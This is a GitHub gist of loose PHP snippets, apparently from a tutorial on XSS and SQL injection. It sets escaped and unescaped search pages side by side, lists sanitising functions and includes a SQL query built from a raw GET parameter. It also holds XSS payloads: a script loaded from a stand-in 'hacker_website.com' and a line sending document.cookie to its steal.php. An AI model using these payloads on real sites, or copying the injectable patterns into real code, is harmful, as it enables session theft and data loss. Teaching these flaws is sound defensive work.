Skip to content

Instantly share code, notes, and snippets.

@webexpl0it webexpl0it/1.php
Created Nov 6, 2019

Embed
What would you like to do?
<?
$a=3;
?>
<?php
$term = $_GET['term'];
?>
<html>
<body>
Search results for : <?php echo htmlentities($term); ?>
</body>
</html>
htmlentities()
strip_tags ()
utf8_decode ()
htmlspecialchars()
ctype_digit()
ctype_alnum()
stripslashes()
str_replace()
http://www.site.com/path/page.php?id=5
$id = $_GET['id'];
$this->db->query("SELECT * FROM pages WHERE id = '$id'");
search.php?term=ipad
<?php
$term = $_GET['term'];
?>
<html>
<body>
Search results for : <?php echo $term; ?>
</body>
</html>
http://www.original_website.com/search.php?term=<script>alert('hi');</script>
<script type=text/javascript src="https://www.hacker_website.com/xss.js"></script>
document.location = 'http://www.hacker_website.com/steal.php?cookies=' + encodeURI(document.cookie);
<script type=text/javascript src="https://www.original_website.com/delete_content.php"></script>
<?php
/*
Database connection details
*/
$db_host = 'localhost';
$db_user = 'project';
$db_pass = 'secret';
$db_name = 'project_ecommerce';
?>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
You can’t perform that action at this time.